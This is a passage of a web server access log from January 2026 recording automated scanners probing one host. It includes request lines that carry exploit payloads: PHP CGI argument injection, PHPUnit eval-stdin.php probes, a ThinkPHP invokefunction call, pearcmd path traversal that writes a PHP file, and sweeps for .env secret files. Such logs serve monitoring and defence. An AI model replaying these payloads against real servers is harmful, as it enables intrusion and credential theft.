(KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:48:19 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 74.208.72.110] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:10:48:19 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 74.208.72.110] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:10:48:19 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:20 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 74.208.72.110] [Length 154] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:22 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:23 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:23 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:24 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:24 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:24 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:24 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:25 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:25 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:25 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:25 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:26 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:26 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:29 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:29 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:29 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:29 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:30 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:30 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:31 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:32 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:32 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:32 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:32 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:32 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:33 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:48:33 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 74.208.72.110] [Length 150] [Gzip -] "libredtail-http" "-" +[21/Jan/2026:10:52:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:57:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:00:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:04:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:11:08:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 20.65.193.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:11:13:59 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.221.66.74] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:11:21:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:11:22:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:38:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:38:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:43:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:45:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:49:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:11:58:38 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:12:05:50 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Android 4.1.2; Tablet; rv:51.0) Gecko/51.0 Firefox/51.0" "-" +[21/Jan/2026:12:08:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.154.154] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:12:08:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.154.154] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:12:09:08 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:12:13:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:12:30:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:12:31:16 +0000] 404 - GET http 91.82.83.208 "/login.asp" [Client 151.242.144.223] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:12:36:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:12:40:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:12:49:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:03:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:06:58 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:13:08:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:12:20 +0000] 400 - GET http 91.82.83.208 "/login" [Client 176.65.148.220] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[21/Jan/2026:13:28:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:28:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:30:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.133.91.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:13:32:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:35:05 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/52.0.2871.30" "-" +[21/Jan/2026:13:35:07 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" +[21/Jan/2026:13:35:07 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.4.19-4GB i686) Opera 6.03 [en]" "-" +[21/Jan/2026:13:35:07 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Android 5.0; Mobile; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[21/Jan/2026:13:35:07 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" "-" +[21/Jan/2026:13:35:07 +0000] 404 - GET http 91.82.83.208 "/demo/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17" "-" +[21/Jan/2026:13:35:08 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50" "-" +[21/Jan/2026:13:35:09 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1" "-" +[21/Jan/2026:13:35:09 +0000] 404 - GET http 91.82.83.208 "/mail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-I9000 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[21/Jan/2026:13:35:09 +0000] 404 - GET http 91.82.83.208 "/m/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36" "-" +[21/Jan/2026:13:35:16 +0000] 404 - GET http 91.82.83.208 "/remote/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32" "-" +[21/Jan/2026:13:35:16 +0000] 404 - GET http 91.82.83.208 "/webmail/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" "-" +[21/Jan/2026:13:35:16 +0000] 404 - GET http 91.82.83.208 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/10.0 Safari/602.1.31" "-" +[21/Jan/2026:13:35:16 +0000] 404 - GET http 91.82.83.208 "/vpn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27" "-" +[21/Jan/2026:13:35:17 +0000] 404 - GET http 91.82.83.208 "/secure/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36" "-" +[21/Jan/2026:13:35:17 +0000] 404 - GET http 91.82.83.208 "/shop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_2 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 EdgiOS/41.41.4.0 Mobile/15B202 Safari/604.3.5" "-" +[21/Jan/2026:13:35:17 +0000] 404 - GET http 91.82.83.208 "/cloud/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0" "-" +[21/Jan/2026:13:35:17 +0000] 404 - GET http 91.82.83.208 "/portal/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" "-" +[21/Jan/2026:13:35:17 +0000] 404 - GET http 91.82.83.208 "/host/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "-" +[21/Jan/2026:13:35:19 +0000] 404 - GET http 91.82.83.208 "/support/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; de-de; SM-T110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[21/Jan/2026:13:35:20 +0000] 404 - GET http 91.82.83.208 "/pop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/7 (Gloria) Firefox/3.0.10" "-" +[21/Jan/2026:13:35:20 +0000] 404 - GET http 91.82.83.208 "/store/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3" "-" +[21/Jan/2026:13:35:20 +0000] 404 - GET http 91.82.83.208 "/cdn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/dashboard/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/test/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_5) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/smtp/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera 8.51 on Windows XP Opera/8.51 (Windows NT 5.1; U; en)" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/wiki/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; pt-br; GT-S6313T Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/help/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; es-us; HTC0P3P7 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[21/Jan/2026:13:35:22 +0000] 404 - GET http 91.82.83.208 "/blog/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Microsoft Windows NT 6.1.7601 Service Pack 1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Version/ 5.0.2Safari/ 5.0.2" "-" +[21/Jan/2026:13:37:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:43:06 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:56:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:13:58:26 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[21/Jan/2026:14:02:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 117.204.164.193] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:14:19:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:19:22 +0000] 404 - POST http 91.82.83.208 "/app/api/login" [Client 104.244.79.113] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/135.0.0.0 Safari/537.36" "-" +[21/Jan/2026:14:20:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:21:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 